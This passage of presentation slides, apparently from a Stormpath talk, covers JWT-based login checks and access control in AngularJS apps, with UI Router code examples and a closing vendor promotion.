  • 51. Is the user logged in? • Cookies can’t tell you this, if using HttpOnly. • Argument FOR putting token in local storage, so JS can inspect. Worth the XSS tradeoff?
  • 52. Is the user logged in? • Request a /me route, which requires token authentication. • This route returns the user object. • Use a promise to return this object.
  • 53. angular.module('myapp') .config(function($stateProvider) { $stateProvider .state('home', { url: '/', templateUrl: 'views/home.html', resolve: { user: function($auth) { return $auth.getUser(); } } }); }); UI Router Example
  • 54. Is the user logged in? • UI Router: use $stateChangeError to handle failed user promise, direct to login view. • ngRoute: $routeChangeError
  • 55. Is the user logged in? • Maintain $rootScope.user • null = we don’t know yet • false = not logged in • {} = we have the user’s data • Broadcast $authenticated event when user is known.
  • 56. Can the user access this view? • Another argument for local token storage and inspection. But, XSS! • Otherwise, fetch scope from /me route.
  • 57. $stateProvider .state('home', { url: '/', templateUrl: 'views/home.html', resolve: { user: function($auth) { return $auth.getUser() .then(function(user){ // can access resource? // return true/false }) } } }); UI Router Example
  • 58. Has Access Been Revoked? • If you see a 401 from your API service, broadcast an $unauthenticated event. • Redirect to login view.
  • 59. Fin
  • 60. Recap • JWTs help with authentication and authorization architecture. • The are NOT a “security” add-on. • They’re a more magical session ID. • Store JWTs securely!
  • 62. Use Stormpath for API Authentication & Security Our API and libraries give you a cloud-based user database and web application security in no time! Get started with your free Stormpath developer account: https://api.stormpath.com/register Questions? support@stormpath.com